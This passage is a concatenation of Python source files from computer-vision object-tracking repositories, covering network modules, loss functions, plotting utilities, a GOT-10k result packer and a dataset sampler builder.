return params
```
#### File: pytracking/util_scripts/pack_got10k_results.py
```python
import numpy as np
import os
import shutil
from pytracking.evaluation.environment import env_settings
def pack_got10k_results(tracker_name, param_name, output_name):
""" Packs toolkit results into a zip folder which can be directly uploaded to the evaluation server. The packed
file is saved in the folder env_settings().got_packed_results_path
args:
tracker_name - name of the tracker
param_name - name of the parameter file
output_name - name of the packed zip file
"""
output_path = os.path.join(env_settings().got_packed_results_path, output_name)
if not os.path.exists(output_path):
os.makedirs(output_path)
results_path = env_settings().results_path
for i in range(1,181):
seq_name = 'GOT-10k_Test_{:06d}'.format(i)
seq_output_path = '{}/{}'.format(output_path, seq_name)
if not os.path.exists(seq_output_path):
os.makedirs(seq_output_path)
for run_id in range(1):
res = np.loadtxt('{}/{}/{}_{:03d}/{}.txt'.format(results_path, tracker_name, param_name, run_id, seq_name), dtype=np.float64)
times = np.loadtxt(
'{}/{}/{}_{:03d}/{}_time.txt'.format(results_path, tracker_name, param_name, run_id, seq_name),
dtype=np.float64)
np.savetxt('{}/{}_{:03d}.txt'.format(seq_output_path, seq_name, run_id+1), res, delimiter=',', fmt='%f')
np.savetxt('{}/{}_time.txt'.format(seq_output_path, seq_name), times, fmt='%f')
# Generate ZIP file
shutil.make_archive(output_path, 'zip', output_path)
# Remove raw text files
shutil.rmtree(output_path)
def main():
pack_got10k_results('transt', 'transt50', 'transt')
if __name__ == '__main__':
main()
```
|
{
"source": "Jee-King/ICCV2021_Event_Frame_Tracking",
"score": 3
}
|
#### File: models/backbone/counter_guide.py
```python
import torch,os
import torch.nn as nn
from torch.nn.parameter import Parameter
class Multi_Context(nn.Module):
def __init__(self, inchannels):
super(Multi_Context, self).__init__()
self.conv2_1 = nn.Sequential(
nn.Conv2d(in_channels=inchannels, out_channels=inchannels, kernel_size=1, stride=1, padding=0),
nn.BatchNorm2d(inchannels),
nn.ReLU(inplace=True))
self.conv2_2 = nn.Sequential(
nn.Conv2d(in_channels=inchannels, out_channels=inchannels, kernel_size=3, stride=1, padding=1),
nn.BatchNorm2d(inchannels),
nn.ReLU(inplace=True))
self.conv2_3 = nn.Sequential(
nn.Conv2d(in_channels=inchannels, out_channels=inchannels, kernel_size=5, stride=1, padding=2),
nn.BatchNorm2d(inchannels),
nn.ReLU(inplace=True))
self.conv2 = nn.Sequential(
nn.Conv2d(in_channels=inchannels * 3, out_channels=inchannels, kernel_size=3, padding=1),
nn.BatchNorm2d(inchannels))
def forward(self, x):
x1 = self.conv2_1(x)
x2 = self.conv2_2(x)
x3 = self.conv2_3(x)
x = torch.cat([x1,x2,x3], dim=1)
x = self.conv2(x)
return x
class Adaptive_Weight(nn.Module):
def __init__(self, inchannels):
super(Adaptive_Weight, self).__init__()
self.avg = nn.AdaptiveAvgPool2d(1)
self.inchannels = inchannels
self.fc1 = nn.Conv2d(inchannels, inchannels//4, kernel_size=1, bias=False)
self.relu1 = nn.ReLU()
self.fc2 = nn.Conv2d(inchannels//4, 1, kernel_size=1, bias=False)
self.relu2 = nn.ReLU()
self.sigmoid = nn.Sigmoid()
def forward(self, x):
x_avg = self.avg(x)
weight = self.relu1(self.fc1(x_avg))
weight = self.relu2(self.fc2(weight))
weight = self.sigmoid(weight)
out = x * weight
return out
class Counter_attention(nn.Module):
def __init__(self, inchannels):
super(Counter_attention, self).__init__()
self.conv1 = nn.Sequential(nn.Conv2d(in_channels=inchannels, out_channels=inchannels, kernel_size=3, padding=1),
nn.BatchNorm2d(inchannels))
self.conv2 = nn.Sequential(nn.Conv2d(in_channels=inchannels, out_channels=inchannels, kernel_size=3, padding=1),
nn.BatchNorm2d(inchannels))
# self.conv3 = nn.Sequential(nn.Conv2d(in_channels=inchannels*2, out_channels=inchannels, kernel_size=1),
# nn.BatchNorm2d(inchannels))
self.sig = nn.Sigmoid()
self.mc1 = Multi_Context(inchannels)
self.mc2 = Multi_Context(inchannels)
self.ada_w1 = Adaptive_Weight(inchannels)
self.ada_w2 = Adaptive_Weight(inchannels)
def forward(self, assistant, present):
mc1 = self.mc1(assistant)
pr1 = present * self.sig(mc1)
pr2 = self.conv1(present)
pr2 = present * self.sig(pr2)
out1 = pr1 + pr2 + present
mc2 = self.mc2(present)
as1 = assistant * self.sig(mc2)
as2 = self.conv2(assistant)
as2 = assistant * self.sig(as2)
out2 = as1 + as2 + assistant
out1 = self.ada_w1(out1)
out2 = self.ada_w2(out2)
out = out1 + out2
# out = torch.cat([out1, out2], dim=1)
# out = self.conv3(out)
return out
class Counter_Guide(nn.Module):
def __init__(self):
super(Counter_Guide, self).__init__()
self.counter_atten1 = Counter_attention(128)
self.counter_atten2 = Counter_attention(256)
def forward(self, frame1, frame2, event1, event2):
out1 = self.counter_atten1(frame1, event1)
out2 = self.counter_atten2(frame2, event2)
return out1, out2
if __name__ == '__main__':
net = Counter_Guide()
os.environ['CUDA_VISIBLE_DEVICES'] = '0'
net = net.cuda()
var1 = torch.FloatTensor(10, 128, 36, 36).cuda()
var2 = torch.FloatTensor(10, 256, 18, 18).cuda()
var3 = torch.FloatTensor(10, 128, 36, 36).cuda()
var4 = torch.FloatTensor(10, 256, 18, 18).cuda()
# var = Variable(var)
out1, out2 = net(var1, var2, var3, var4)
print('*************')
print(out1.shape, out2.shape)
```
#### File: models/loss/kl_regression.py
```python
import math
import torch
import torch.nn as nn
from torch.nn import functional as F
class KLRegression(nn.Module):
"""KL-divergence loss for probabilistic regression.
It is computed using Monte Carlo (MC) samples from an arbitrary distribution."""
def __init__(self, eps=0.0):
super().__init__()
self.eps = eps
def forward(self, scores, sample_density, gt_density, mc_dim=-1):
"""Args:
scores: predicted score values
sample_density: probability density of the sample distribution
gt_density: probability density of the ground truth distribution
mc_dim: dimension of the MC samples"""
exp_val = scores - torch.log(sample_density + self.eps)
L = torch.logsumexp(exp_val, dim=mc_dim) - math.log(scores.shape[mc_dim]) - \
torch.mean(scores * (gt_density / (sample_density + self.eps)), dim=mc_dim)
return L.mean()
class MLRegression(nn.Module):
"""Maximum likelihood loss for probabilistic regression.
It is computed using Monte Carlo (MC) samples from an arbitrary distribution."""
def __init__(self, eps=0.0):
super().__init__()
self.eps = eps
def forward(self, scores, sample_density, gt_density=None, mc_dim=-1):
"""Args:
scores: predicted score values. First sample must be ground-truth
sample_density: probability density of the sample distribution
gt_density: not used
mc_dim: dimension of the MC samples. Only mc_dim=1 supported"""
assert mc_dim == 1
assert (sample_density[:,0,...] == -1).all()
exp_val = scores[:, 1:, ...] - torch.log(sample_density[:, 1:, ...] + self.eps)
L = torch.logsumexp(exp_val, dim=mc_dim) - math.log(scores.shape[mc_dim] - 1) - scores[:, 0, ...]
loss = L.mean()
return loss
class KLRegressionGrid(nn.Module):
"""KL-divergence loss for probabilistic regression.
It is computed using the grid integration strategy."""
def forward(self, scores, gt_density, grid_dim=-1, grid_scale=1.0):
"""Args:
scores: predicted score values
gt_density: probability density of the ground truth distribution
grid_dim: dimension(s) of the grid
grid_scale: area of one grid cell"""
score_corr = grid_scale * torch.sum(scores * gt_density, dim=grid_dim)
L = torch.logsumexp(scores, dim=grid_dim) + math.log(grid_scale) - score_corr
return L.mean()
```
#### File: models/lwl/initializer.py
```python
import torch.nn as nn
class FilterInitializerZero(nn.Module):
"""Initializes a target model with zeros.
args:
filter_size: Size of the filter.
feature_dim: Input feature dimentionality."""
def __init__(self, filter_size=1, num_filters=1, feature_dim=256, filter_groups=1):
super().__init__()
self.filter_size = (num_filters, feature_dim//filter_groups, filter_size, filter_size)
def forward(self, feat, mask=None):
assert feat.dim() == 5
# num_sequences = feat.shape[1] if feat.dim() == 5 else 1
num_sequences = feat.shape[1]
return feat.new_zeros(num_sequences, *self.filter_size)
```
#### File: models/lwl/linear_filter.py
```python
import torch.nn as nn
import ltr.models.layers.filter as filter_layer
import math
from pytracking import TensorList
class LinearFilter(nn.Module):
""" Target model constituting a single conv layer, along with the few-shot learner used to obtain the target model
parameters (referred to as filter), i.e. weights of the conv layer
"""
def __init__(self, filter_size, filter_initializer, filter_optimizer=None, feature_extractor=None,
filter_dilation_factors=None):
super().__init__()
self.filter_size = filter_size
self.feature_extractor = feature_extractor # Extracts features input to the target model
self.filter_initializer = filter_initializer # Predicts an initial filter in a feed-forward manner
self.filter_optimizer = filter_optimizer # Iteratively updates the filter by minimizing the few-shot
# learning loss
self.filter_dilation_factors = filter_dilation_factors
# Init weights
for m in self.feature_extractor.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
if m.bias is not None:
m.bias.data.zero_()
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
def forward(self, train_feat, test_feat, train_label, *args, **kwargs):
""" the mask should be 5d"""
assert train_label.dim() == 5
num_sequences = train_label.shape[1]
if train_feat.dim() == 5:
train_feat = train_feat.view(-1, *train_feat.shape[-3:])
if test_feat.dim() == 5:
test_feat = test_feat.view(-1, *test_feat.shape[-3:])
# Extract target model features
train_feat = self.extract_target_model_features(train_feat, num_sequences)
test_feat = self.extract_target_model_features(test_feat, num_sequences)
# Train filter
filter, filter_iter, _ = self.get_filter(train_feat, train_label,
*args, **kwargs)
# Predict mask encodings for the test frames
mask_encodings = [self.apply_target_model(f, test_feat) for f in filter_iter]
return mask_encodings
def extract_target_model_features(self, feat, num_sequences=None):
if self.feature_extractor is None:
return feat
if num_sequences is None:
return self.feature_extractor(feat)
output = self.feature_extractor(feat)
return output.view(-1, num_sequences, *output.shape[-3:])
def apply_target_model(self, weights, feat):
""" Apply the target model to obtain the mask encodings"""
mask_encoding = filter_layer.apply_filter(feat, weights, dilation_factors=self.filter_dilation_factors)
return mask_encoding
def get_filter(self, feat, train_label, train_sw, num_objects=None, *args, **kwargs):
""" Get the initial target model parameters given the few-shot labels """
if num_objects is None:
weights = self.filter_initializer(feat, train_label)
else:
weights = self.filter_initializer(feat, train_label)
weights = weights.repeat(1, num_objects, 1, 1, 1)
if self.filter_optimizer is not None:
weights, weights_iter, losses = self.filter_optimizer(TensorList([weights]), feat=feat, label=train_label,
sample_weight=train_sw,
*args, **kwargs)
weights = weights[0]
weights_iter = [w[0] for w in weights_iter]
else:
weights_iter = [weights]
losses = None
return weights, weights_iter, losses
```
#### File: models/lwl/lwl_net.py
```python
import math
import torch
import torch.nn as nn
from collections import OrderedDict
import ltr.models.lwl.linear_filter as target_clf
import ltr.models.target_classifier.features as clf_features
import ltr.models.lwl.initializer as seg_initializer
import ltr.models.lwl.label_encoder as seg_label_encoder
import ltr.models.lwl.loss_residual_modules as loss_residual_modules
import ltr.models.lwl.decoder as lwtl_decoder
import ltr.models.backbone as backbones
import ltr.models.backbone.resnet_mrcnn as mrcnn_backbones
import ltr.models.meta.steepestdescent as steepestdescent
from ltr import model_constructor
from pytracking import TensorList
class LWTLNet(nn.Module):
def __init__(self, feature_extractor, target_model, decoder, target_model_input_layer, decoder_input_layers,
label_encoder=None):
super().__init__()
self.feature_extractor = feature_extractor # Backbone feature extractor F
self.target_model = target_model # Target model and the few-shot learner
self.decoder = decoder # Segmentation Decoder
self.label_encoder = label_encoder # Few-shot label generator and weight predictor
self.target_model_input_layer = (target_model_input_layer,) if isinstance(target_model_input_layer,
str) else target_model_input_layer
self.decoder_input_layers = decoder_input_layers
self.output_layers = sorted(list(set(self.target_model_input_layer + self.decoder_input_layers)))
def forward(self, train_imgs, test_imgs, train_masks, test_masks, num_refinement_iter=2):
num_sequences = train_imgs.shape[1]
num_train_frames = train_imgs.shape[0]
num_test_frames = test_imgs.shape[0]
# Extract backbone features
train_feat_backbone = self.extract_backbone_features(
train_imgs.view(-1, train_imgs.shape[-3], train_imgs.shape[-2], train_imgs.shape[-1]))
test_feat_backbone = self.extract_backbone_features(
test_imgs.view(-1, test_imgs.shape[-3], test_imgs.shape[-2], test_imgs.shape[-1]))
# Extract features input to the target model
train_feat_tm = self.extract_target_model_features(train_feat_backbone) # seq*frames, channels, height, width
train_feat_tm = train_feat_tm.view(num_train_frames, num_sequences, *train_feat_tm.shape[-3:])
train_feat_tm_all = [train_feat_tm, ]
# Get few-shot learner label and spatial importance weights
few_shot_label, few_shot_sw = self.label_encoder(train_masks, train_feat_tm)
few_shot_label_all = [few_shot_label, ]
few_shot_sw_all = None if few_shot_sw is None else [few_shot_sw, ]
test_feat_tm = self.extract_target_model_features(test_feat_backbone) # seq*frames, channels, height, width
# Obtain the target module parameters using the few-shot learner
filter, filter_iter, _ = self.target_model.get_filter(train_feat_tm, few_shot_label, few_shot_sw)
mask_predictons_all = []
# Iterate over the test sequence
for i in range(num_test_frames):
# Features for the current frame
test_feat_tm_it = test_feat_tm.view(num_test_frames, num_sequences, *test_feat_tm.shape[-3:])[i:i+1, ...]
# Apply the target model to obtain mask encodings.
mask_encoding_pred = [self.target_model.apply_target_model(f, test_feat_tm_it) for f in filter_iter]
test_feat_backbone_it = {k: v.view(num_test_frames, num_sequences, *v.shape[-3:])[i, ...] for k, v in
test_feat_backbone.items()}
mask_encoding_pred_last_iter = mask_encoding_pred[-1]
# Run decoder to obtain the segmentation mask
mask_pred, decoder_feat = self.decoder(mask_encoding_pred_last_iter, test_feat_backbone_it,
test_imgs.shape[-2:])
mask_pred = mask_pred.view(1, num_sequences, *mask_pred.shape[-2:])
mask_predictons_all.append(mask_pred)
# Convert the segmentation scores to probability
mask_pred_prob = torch.sigmoid(mask_pred.clone().detach())
# Obtain label encoding for the predicted mask in the previous frame
few_shot_label, few_shot_sw = self.label_encoder(mask_pred_prob, test_feat_tm_it)
# Extend the training data using the predicted mask
few_shot_label_all.append(few_shot_label)
if few_shot_sw_all is not None:
few_shot_sw_all.append(few_shot_sw)
train_feat_tm_all.append(test_feat_tm_it)
# Update the target model using the extended training set
if (i < (num_test_frames - 1)) and (num_refinement_iter > 0):
train_feat_tm_it = torch.cat(train_feat_tm_all, dim=0)
few_shot_label_it = torch.cat(few_shot_label_all, dim=0)
if few_shot_sw_all is not None:
few_shot_sw_it = torch.cat(few_shot_sw_all, dim=0)
else:
few_shot_sw_it = None
# Run few-shot learner to update the target model
filter_updated, _, _ = self.target_model.filter_optimizer(TensorList([filter]),
feat=train_feat_tm_it,
label=few_shot_label_it,
sample_weight=few_shot_sw_it,
num_iter=num_refinement_iter)
filter = filter_updated[0] # filter_updated is a TensorList
mask_predictons_all = torch.cat(mask_predictons_all, dim=0)
return mask_predictons_all
def segment_target(self, target_filter, test_feat_tm, test_feat):
# Classification features
assert target_filter.dim() == 5 # seq, filters, ch, h, w
test_feat_tm = test_feat_tm.view(1, 1, *test_feat_tm.shape[-3:])
mask_encoding_pred = self.target_model.apply_target_model(target_filter, test_feat_tm)
mask_pred, decoder_feat = self.decoder(mask_encoding_pred, test_feat,
(test_feat_tm.shape[-2]*16, test_feat_tm.shape[-1]*16))
return mask_pred, mask_encoding_pred
def get_backbone_target_model_features(self, backbone_feat):
# Get the backbone feature block which is input to the target model
feat = OrderedDict({l: backbone_feat[l] for l in self.target_model_input_layer})
if len(self.target_model_input_layer) == 1:
return feat[self.target_model_input_layer[0]]
return feat
def extract_target_model_features(self, backbone_feat):
return self.target_model.extract_target_model_features(self.get_backbone_target_model_features(backbone_feat))
def extract_backbone_features(self, im, layers=None):
if layers is None:
layers = self.output_layers
return self.feature_extractor(im, layers)
@model_constructor
def steepest_descent_resnet50(filter_size=1, num_filters=1, optim_iter=3, optim_init_reg=0.01,
backbone_pretrained=False, clf_feat_blocks=1,
clf_feat_norm=True, final_conv=False,
out_feature_dim=512,
target_model_input_layer='layer3',
decoder_input_layers=("layer4", "layer3", "layer2", "layer1",),
detach_length=float('Inf'),
label_encoder_dims=(1, 1),
frozen_backbone_layers=(),
decoder_mdim=64, filter_groups=1,
use_bn_in_label_enc=True,
dilation_factors=None,
backbone_type='imagenet'):
# backbone feature extractor F
if backbone_type == 'imagenet':
backbone_net = backbones.resnet50(pretrained=backbone_pretrained, frozen_layers=frozen_backbone_layers)
elif backbone_type == 'mrcnn':
backbone_net = mrcnn_backbones.resnet50(pretrained=False, frozen_layers=frozen_backbone_layers)
else:
raise Exception
norm_scale = math.sqrt(1.0 / (out_feature_dim * filter_size * filter_size))
layer_channels = backbone_net.out_feature_channels()
# Extracts features input to the target model
target_model_feature_extractor = clf_features.residual_basic_block(
feature_dim=layer_channels[target_model_input_layer],
num_blocks=clf_feat_blocks, l2norm=clf_feat_norm,
final_conv=final_conv, norm_scale=norm_scale,
out_dim=out_feature_dim)
# Few-shot label generator and weight predictor
label_encoder = seg_label_encoder.ResidualDS16SW(layer_dims=label_encoder_dims + (num_filters,),
use_bn=use_bn_in_label_enc)
# Predicts initial target model parameters
initializer = seg_initializer.FilterInitializerZero(filter_size=filter_size, num_filters=num_filters,
feature_dim=out_feature_dim, filter_groups=filter_groups)
# Computes few-shot learning loss
residual_module = loss_residual_modules.LWTLResidual(init_filter_reg=optim_init_reg,
filter_dilation_factors=dilation_factors)
# Iteratively updates the target model parameters by minimizing the few-shot learning loss
optimizer = steepestdescent.GNSteepestDescent(residual_module=residual_module, num_iter=optim_iter,
detach_length=detach_length,
residual_batch_dim=1, compute_losses=True)
# Target model and Few-shot learner
target_model = target_clf.LinearFilter(filter_size=filter_size, filter_initializer=initializer,
filter_optimizer=optimizer, feature_extractor=target_model_feature_extractor,
filter_dilation_factors=dilation_factors)
# Decoder
decoder_input_layers_channels = {L: layer_channels[L] for L in decoder_input_layers}
decoder = lwtl_decoder.LWTLDecoder(num_filters, decoder_mdim, decoder_input_layers_channels, use_bn=True)
net = LWTLNet(feature_extractor=backbone_net, target_model=target_model, decoder=decoder,
label_encoder=label_encoder,
target_model_input_layer=target_model_input_layer, decoder_input_layers=decoder_input_layers)
return net
```
#### File: models/tracking/kysnet.py
```python
import math
import torch
import torch.nn as nn
from collections import OrderedDict
import ltr.models.target_classifier as target_clf
import ltr.models.target_classifier.features as clf_features
import ltr.models.target_classifier.optimizer as clf_optimizer
import ltr.models.target_classifier.initializer as clf_initializer
import ltr.models.kys.predictor_wrapper as predictor_wrappers
import ltr.models.kys.response_predictor as resp_pred
import ltr.models.kys.cost_volume as cost_volume
import ltr.models.bbreg as bbmodels
import ltr.models.backbone as backbones
from ltr import model_constructor
class KYSNet(nn.Module):
def train(self, mode=True):
self.training = mode
self.backbone_feature_extractor.train(False)
self.dimp_classifier.train(False)
self.predictor.train(mode)
self.bb_regressor.train(mode)
if self.motion_feat_extractor is not None:
self.motion_feat_extractor.train(mode)
return self
def __init__(self, backbone_feature_extractor, dimp_classifier, predictor,
bb_regressor, classification_layer, bb_regressor_layer, train_feature_extractor=True,
train_iounet=True, motion_feat_extractor=None, motion_layer=()):
super().__init__()
assert not train_feature_extractor
self.backbone_feature_extractor = backbone_feature_extractor
self.dimp_classifier = dimp_classifier
self.predictor = predictor
self.bb_regressor = bb_regressor
self.classification_layer = classification_layer
self.bb_regressor_layer = bb_regressor_layer
self.motion_layer = list(motion_layer)
self.output_layers = sorted(list(set([self.classification_layer] + self.bb_regressor_layer + self.motion_layer)))
self.train_iounet = train_iounet
self.motion_feat_extractor = motion_feat_extractor
if not train_feature_extractor:
for p in self.backbone_feature_extractor.parameters():
p.requires_grad_(False)
def forward(self, test_image_cur, dimp_filters, test_label_cur, backbone_feat_prev, label_prev,
anno_prev, dimp_scores_prev, state_prev, dimp_jitter_fn):
raise NotImplementedError
def train_classifier(self, train_imgs, train_bb):
assert train_imgs.dim() == 5, 'Expect 5 dimensions for train'
num_sequences = train_imgs.shape[1]
num_train_images = train_imgs.shape[0]
# Extract backbone features
train_feat = self.extract_backbone_features(
train_imgs.view(-1, train_imgs.shape[-3], train_imgs.shape[-2], train_imgs.shape[-1]))
# Classification features
train_feat_clf = train_feat[self.classification_layer]
train_feat_clf = train_feat_clf.view(num_train_images, num_sequences, train_feat_clf.shape[-3],
train_feat_clf.shape[-2], train_feat_clf.shape[-1])
filter, train_losses = self.dimp_classifier.train_classifier(train_feat_clf, train_bb)
return filter
def extract_backbone_features(self, im, layers=None):
im = im.view(-1, *im.shape[-3:])
if layers is None:
layers = self.output_layers
return self.backbone_feature_extractor(im, layers)
def get_backbone_clf_feat(self, backbone_feat):
feat = backbone_feat[self.classification_layer]
return feat
def get_backbone_bbreg_feat(self, backbone_feat):
return [backbone_feat[l] for l in self.bb_regressor_layer]
def extract_classification_feat(self, backbone_feat):
return self.dimp_classifier.extract_classification_feat(self.get_backbone_clf_feat(backbone_feat))
def get_motion_feat(self, backbone_feat):
if self.motion_feat_extractor is not None:
motion_feat = self.motion_feat_extractor(backbone_feat)
return motion_feat
else:
return self.predictor.extract_motion_feat(backbone_feat[self.classification_layer])
def extract_features(self, im, layers):
if 'classification' not in layers:
return self.backbone_feature_extractor(im, layers)
backbone_layers = sorted(list(set([l for l in layers + [self.classification_layer] if l != 'classification' and l != 'motion'])))
all_feat = self.backbone_feature_extractor(im, backbone_layers)
all_feat['classification'] = self.dimp_classifier.extract_classification_feat(all_feat[self.classification_layer])
if self.motion_feat_extractor is not None:
motion_feat = self.motion_feat_extractor(all_feat)
all_feat['motion'] = motion_feat
else:
all_feat['motion'] = self.predictor.extract_motion_feat(all_feat[self.classification_layer])
return OrderedDict({l: all_feat[l] for l in layers})
@model_constructor
def kysnet_res50(filter_size=4, optim_iter=3, appearance_feature_dim=512,
optim_init_step=0.9, optim_init_reg=0.1, classification_layer='layer3', backbone_pretrained=True,
clf_feat_blocks=0, clf_feat_norm=True, final_conv=True, init_filter_norm=False,
mask_init_factor=3.0, score_act='relu', target_mask_act='sigmoid', num_dist_bins=100,
bin_displacement=0.1, detach_length=float('Inf'),train_feature_extractor=True, train_iounet=True,
iou_input_dim=(256, 256), iou_inter_dim=(256, 256),
cv_kernel_size=3, cv_max_displacement=9, cv_stride=1,
init_gauss_sigma=1.0,
state_dim=8, representation_predictor_dims=(64, 32), gru_ksz=3,
conf_measure='max', dimp_thresh=None):
# ######################## backbone ########################
backbone_net = backbones.resnet50(pretrained=backbone_pretrained)
norm_scale = math.sqrt(1.0 / (appearance_feature_dim * filter_size * filter_size))
# ######################## classifier ########################
clf_feature_extractor = clf_features.residual_bottleneck(num_blocks=clf_feat_blocks, l2norm=clf_feat_norm,
final_conv=final_conv, norm_scale=norm_scale,
out_dim=appearance_feature_dim)
# Initializer for the DiMP classifier
initializer = clf_initializer.FilterInitializerLinear(filter_size=filter_size, filter_norm=init_filter_norm,
feature_dim=appearance_feature_dim)
# Optimizer for the DiMP classifier
optimizer = clf_optimizer.DiMPSteepestDescentGN(num_iter=optim_iter, feat_stride=16,
init_step_length=optim_init_step,
init_filter_reg=optim_init_reg, init_gauss_sigma=init_gauss_sigma,
num_dist_bins=num_dist_bins,
bin_displacement=bin_displacement,
mask_init_factor=mask_init_factor,
score_act=score_act, act_param=None, mask_act=target_mask_act,
detach_length=detach_length)
# The classifier module
classifier = target_clf.LinearFilter(filter_size=filter_size, filter_initializer=initializer,
filter_optimizer=optimizer, feature_extractor=clf_feature_extractor)
# Bounding box regressor
bb_regressor = bbmodels.AtomIoUNet(input_dim=(4 * 128, 4 * 256), pred_input_dim=iou_input_dim,
pred_inter_dim=iou_inter_dim)
cost_volume_layer = cost_volume.CostVolume(cv_kernel_size, cv_max_displacement, stride=cv_stride,
abs_coordinate_output=True)
motion_response_predictor = resp_pred.ResponsePredictor(state_dim=state_dim,
representation_predictor_dims=representation_predictor_dims,
gru_ksz=gru_ksz,
conf_measure=conf_measure,
dimp_thresh=dimp_thresh)
response_predictor = predictor_wrappers.PredictorWrapper(cost_volume_layer, motion_response_predictor)
net = KYSNet(backbone_feature_extractor=backbone_net, dimp_classifier=classifier,
predictor=response_predictor,
bb_regressor=bb_regressor,
classification_layer=classification_layer, bb_regressor_layer=['layer2', 'layer3'],
train_feature_extractor=train_feature_extractor,
train_iounet=train_iounet)
return net
```
#### File: pytracking/utils/plotting.py
```python
import matplotlib.pyplot as plt
import numpy as np
import torch
import cv2
def draw_figure(fig):
fig.canvas.draw()
fig.canvas.flush_events()
plt.pause(0.001)
def show_tensor(a: torch.Tensor, fig_num = None, title = None, range=(None, None), ax=None):
"""Display a 2D tensor.
args:
fig_num: Figure number.
title: Title of figure.
"""
a_np = a.squeeze().cpu().clone().detach().numpy()
if a_np.ndim == 3:
a_np = np.transpose(a_np, (1, 2, 0))
if ax is None:
fig = plt.figure(fig_num)
plt.tight_layout()
plt.cla()
plt.imshow(a_np, vmin=range[0], vmax=range[1])
plt.axis('off')
plt.axis('equal')
if title is not None:
plt.title(title)
draw_figure(fig)
else:
ax.cla()
ax.imshow(a_np, vmin=range[0], vmax=range[1])
ax.set_axis_off()
ax.axis('equal')
if title is not None:
ax.set_title(title)
draw_figure(plt.gcf())
def plot_graph(a: torch.Tensor, fig_num = None, title = None):
"""Plot graph. Data is a 1D tensor.
args:
fig_num: Figure number.
title: Title of figure.
"""
a_np = a.squeeze().cpu().clone().detach().numpy()
if a_np.ndim > 1:
raise ValueError
fig = plt.figure(fig_num)
# plt.tight_layout()
plt.cla()
plt.plot(a_np)
if title is not None:
plt.title(title)
draw_figure(fig)
def show_image_with_boxes(im, boxes, iou_pred=None, disp_ids=None):
im_np = im.clone().cpu().squeeze().numpy()
im_np = np.ascontiguousarray(im_np.transpose(1, 2, 0).astype(np.uint8))
boxes = boxes.view(-1, 4).cpu().numpy().round().astype(int)
# Draw proposals
for i_ in range(boxes.shape[0]):
if disp_ids is None or disp_ids[i_]:
bb = boxes[i_, :]
disp_color = (i_*38 % 256, (255 - i_*97) % 256, (123 + i_*66) % 256)
cv2.rectangle(im_np, (bb[0], bb[1]), (bb[0] + bb[2], bb[1] + bb[3]),
disp_color, 1)
if iou_pred is not None:
text_pos = (bb[0], bb[1] - 5)
cv2.putText(im_np, 'ID={} IOU = {:3.2f}'.format(i_, iou_pred[i_]), text_pos,
cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 255, 0), 1, bottomLeftOrigin=False)
im_tensor = torch.from_numpy(im_np.transpose(2, 0, 1)).float()
return im_tensor
def _pascal_color_map(N=256, normalized=False):
"""
Python implementation of the color map function for the PASCAL VOC data set.
Official Matlab version can be found in the PASCAL VOC devkit
http://host.robots.ox.ac.uk/pascal/VOC/voc2012/index.html#devkit
"""
def bitget(byteval, idx):
return (byteval & (1 << idx)) != 0
dtype = 'float32' if normalized else 'uint8'
cmap = np.zeros((N, 3), dtype=dtype)
for i in range(N):
r = g = b = 0
c = i
for j in range(8):
r = r | (bitget(c, 0) << 7 - j)
g = g | (bitget(c, 1) << 7 - j)
b = b | (bitget(c, 2) << 7 - j)
c = c >> 3
cmap[i] = np.array([r, g, b])
cmap = cmap / 255 if normalized else cmap
return cmap
def overlay_mask(im, ann, alpha=0.5, colors=None, contour_thickness=None):
""" Overlay mask over image.
Source: https://github.com/albertomontesg/davis-interactive/blob/master/davisinteractive/utils/visualization.py
This function allows you to overlay a mask over an image with some
transparency.
# Arguments
im: Numpy Array. Array with the image. The shape must be (H, W, 3) and
the pixels must be represented as `np.uint8` data type.
ann: Numpy Array. Array with the mask. The shape must be (H, W) and the
values must be intergers
alpha: Float. Proportion of alpha to apply at the overlaid mask.
colors: Numpy Array. Optional custom colormap. It must have shape (N, 3)
being N the maximum number of colors to represent.
contour_thickness: Integer. Thickness of each object index contour draw
over the overlay. This function requires to have installed the
package `opencv-python`.
# Returns
Numpy Array: Image of the overlay with shape (H, W, 3) and data type
`np.uint8`.
"""
im, ann = np.asarray(im, dtype=np.uint8), np.asarray(ann, dtype=np.int)
if im.shape[:-1] != ann.shape:
raise ValueError('First two dimensions of `im` and `ann` must match')
if im.shape[-1] != 3:
raise ValueError('im must have three channels at the 3 dimension')
colors = colors or _pascal_color_map()
colors = np.asarray(colors, dtype=np.uint8)
mask = colors[ann]
fg = im * alpha + (1 - alpha) * mask
img = im.copy()
img[ann > 0] = fg[ann > 0]
if contour_thickness: # pragma: no cover
import cv2
for obj_id in np.unique(ann[ann > 0]):
contours = cv2.findContours((ann == obj_id).astype(
np.uint8), cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)[-2:]
cv2.drawContours(img, contours[0], -1, colors[obj_id].tolist(),
contour_thickness)
return img
```
|
{
"source": "Jee-King/STNet",
"score": 2
}
|
#### File: data/sampler/builder.py
```python
from typing import Dict, List
from yacs.config import CfgNode
from videoanalyst.utils import merge_cfg_into_hps
from ..dataset import builder as dataset_builder
from ..filter import builder as filter_builder
from .sampler_base import TASK_SAMPLERS, DatasetBase
def build(task: str, cfg: CfgNode, seed: int = 0) -> DatasetBase:
r"""
Arguments
---------
task: str
task name (track|vos)
cfg: CfgNode
node name: sampler
seed: int
seed for rng initialization
"""
assert task in TASK_SAMPLERS, "invalid task name"
MODULES = TASK_SAMPLERS[task]
submodules_cfg = cfg.submodules
dataset_cfg = submodules_cfg.dataset
datasets = dataset_builder.build(task, dataset_cfg)
if submodules_cfg.filter.name != "":
filter_cfg = submodules_cfg.filter
data_filter = filter_builder.build(task, filter_cfg)
else:
data_filter = None
name = cfg.name
module = MODULES[name](datasets, seed=seed, data_filter=data_filter)
hps = module.get_hps()
hps = merge_cfg_into_hps(cfg[name], hps)
module.set_hps(hps)
module.update_params()
return module
def get_config(task_list: List) -> Dict[str, CfgNode]:
cfg_dict = {name: CfgNode() for name in task_list}
for cfg_name, modules in TASK_SAMPLERS.items():
cfg = cfg_dict[cfg_name]
cfg["name"] = ""
for name in modules:
cfg[name] = CfgNode()
module = modules[name]
hps = module.default_hyper_params
for hp_name in hps:
cfg[name][hp_name] = hps[hp_name]
cfg["submodules"] = CfgNode()
cfg["submodules"]["dataset"] = dataset_builder.get_config(
task_list)[cfg_name]
cfg["submodules"]["filter"] = filter_builder.get_config(
